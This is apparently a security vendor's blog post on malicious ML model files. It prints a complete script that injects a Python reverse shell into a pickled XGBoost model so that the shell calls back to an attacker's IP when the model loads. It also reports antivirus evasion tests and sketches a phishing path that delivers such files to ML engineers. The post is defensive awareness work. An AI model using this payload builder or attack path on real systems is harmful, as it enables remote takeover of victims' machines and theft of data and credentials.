PAI-favicon-120423 MLSecOps-favicon icon3

Model Files are Invisible Viruses

The Underestimated Risk of Model Files in Machine Learning

When a Machine Learning (ML) model is trained it is stored in memory. To save it to disk, so it can be shared with others requires storing it in various formats. The most common and prominent formats, such as pickle, are vulnerable to deserialization attacks where code can be injected into the model which will run upon the model being loaded. This injected code does not affect the model’s ability to perform inference, making it difficult to detect malicious models unless specific tools such as Protect AI’s Guardian are used. Today’s antiviruses and email filters don’t detect payloaded model files making these the perfect phishing campaign attachment. Move over PDFs and macro-enabled Word documents, model files are the new kingphisher. 

How to Payload a Model

Payloading a model is simple. Protect AI has provided examples for doing so in the modelscan repository -

git clone https://github.com/protectai/modelscan/

cd modelscan/notebooks.

Now just save and run the script below as “inject.py” to create a model with a simple Python reverse shell which will send a shell to the attacker’s machine when it’s loaded:

 

import sys

import pickle

import socket

import xgboost

import pandas as pd

from sklearn.model_selection import train_test_split

from utils.pickle_codeinjection import generate_unsafe_file

print('Usage: python inject.py <attacker IP> <attacker port>)

# Arguments

ip = sys.argv[1]

port = sys.argv[2]

model_filename = “xgboost_model.pkl”

# Create model

data = {'target': [1, 0, 1, 0, 1, 0], 'data1': [1, 2, 3, 4, 5, 6], 'data2': [1, 1, 1, 1, 1, 1]}

df = pd.DataFrame(data)

X = df[['data1', 'data2']]

Y = df['target']

X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=42)

model = xgboost.XGBClassifier()

model.fit(X_train, y_train)

# Save the model to a pickle file

pickle.dump(model, open(model_filename, "wb"))

# Open the model file

with open(model_filename, 'rb') as file:

model = pickle.load(file)

payloaded_model_path = "payloaded_xgboost_model.pkl"

command = 'system'

# Add the malicious code here

malicious_code = f'python3 -c \'import pty;import socket,os;t="meterpreter";s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")\''

print(malicious_code)

# Generate a new payloaded model

generate_unsafe_file(model, command, malicious_code, payloaded_model_path)

Run the script: python inject.py 192.168.0.1 4444. 

 

A file will be created in the directory named payloaded_xgboost_model.py. Let’s take a look at it.

We created an XGBoost model with a very obvious, unobfuscated, reverse shell payload that would give an attacker on the 192.168.0.1 IP address complete system access to the victim’s computer that loaded the model. Note that we added a cheeky do-nothing variable in the payload storing the string “meterpreter” to see if we could help out the antiviruses in detecting this as a malicious file. Let’s see how the antiviruses do.

Testing Antiviruses Against a Malicious Model

To illustrate the severity of this issue, we conducted tests on four different types of model files against a number of popular antiviruses:

  1. Plain XGBoost Model: A standard machine learning model file. As expected, no antivirus triggered on this because there was no malicious code.
  2. Python Reverse Shell Model File: A model file embedded with a simple reverse shell script, allowing remote access as seen above.
  3. Python Reverse Shell Model File (Base64 Encoded): Very simple obfuscation of the Python reverse shell, using base64 encoding.
  4. Meterpreter Reverse Shell: An old and commonly used reverse shell that connects back to the sophisticated Metasploit Framework. The tool msfvenom was used with no encoding or special features to generate a one line meterpreter reverse shell.

Microsoft Defender

Payload Type

Detected

Python Reverse Shell

Python Reverse Shell (Base64 Encoded)

Meterpreter Reverse Shell

 

As a red teamer of more than a decade, Microsoft Defender has always been shockingly effective at detecting even obfuscated payloads making the lack of detection on the most obvious payload, the Python reverse shell, rather surprising. Below is the screenshot of Microsoft Defender failing to find either the Python reverse shell or the base64-encoded Python reverse shell.

AVG & Avast!

 

Payload Type

Detected

Python Reverse Shell

Python Reverse Shell (Base64 Encoded)

Meterpreter Reverse Shell

 

AVG and Avast! are owned by the same parent company and have almost identical products. We tested both and found they were able to beat out Defender in detecting the simple Python reverse shell, but failed to detect the payload when it was only slightly obfuscated by base64. Below is a screenshot of AVG failing to find the base64-encoded Python reverse shell.

 

BitDefender

Payload Type

Detected

Python Reverse Shell

Python Reverse Shell (Base64 Encoded)

Python Meterpreter Reverse Shell

 

BitDefender, like Microsoft Defender, also failed to trigger on the basic Python reverse shell which can be seen below.

 

 

MalwareBytes

 

Payload Type

Detected

Python Reverse Shell

Python Reverse Shell (Base64 Encoded)

Python Meterpreter Reverse Shell

 

MalwareBytes detected no threats, even in the Meterpreter reverse shell which can be seen below.

 

A Real-World Attack Scenario

As we can see, not a single antivirus detected the base64-encoded Python reverse shell. Some didn’t even detect the Meterpreter shell which has been a defacto tool in hackers’ arsenals for 20 years! Attackers can easily gain internal network access bypassing your firewall and stealing models, data, and credentials via the following simple attack path:

  1. Targeting via LinkedIn: A hacker searches LinkedIn for machine learning engineers at a specific company.
  2. Email Harvesting: Using tools like TheHarvester.py, the hacker determines the company's email format, often first.lastname@company.com.
  3. Phishing Attack: A carefully crafted phishing email is sent to the engineer, containing the base64-encoded Python reverse shell model file.
  4. Bypassing Security Measures: This email successfully bypasses Gmail's filters as demonstrated in the screenshot below.
  5. Compromise: The high-privilege machine learning engineer's computer is compromised, granting the hacker extensive access and control to models, data, and further credentials which can be sprayed across the network to further network penetration.

Interestingly, even the most obviously payloaded model file with a Meterpreter backdoor bypasses Gmail’s attachment scans and goes right to the inbox. Consider the following phishing attempt:

Straight to inbox, attachment included with a “Scanned by Gmail” message giving the receiver a false sense of confidence. 

Attackers have an infinite number of tries to get a message to members of your organization. If there’s strong email filtering, attackers can always just send the message through LinkedIn, X, Facebook, etc. They can research their phishing target and drop information in the phishing email that the target would assume only trusted people would have access to, increasing the chance of the attachment being opened. Implementing education and safe processes in your organization is the only defense to attacks like this.

Recommendations

This exploration into the vulnerabilities of model files in machine learning environments highlights a critical need for more robust security measures. It's not just the data or the code; the model files themselves can be trojan horses. We recommend getting started by using the open source modelscan tool to scan model files for potential threats, or contact us to learn how Guardian can help your enterprise automatically block models that contain malicious code. All the payloaded model files used above are detected by modelscan along with a multitude of other model formats which can be payloaded such as PyTorch, Keras and TensorFlow’s model serialization protocols. 

Find it on GitHub here: https://github.com/protectai/modelscan.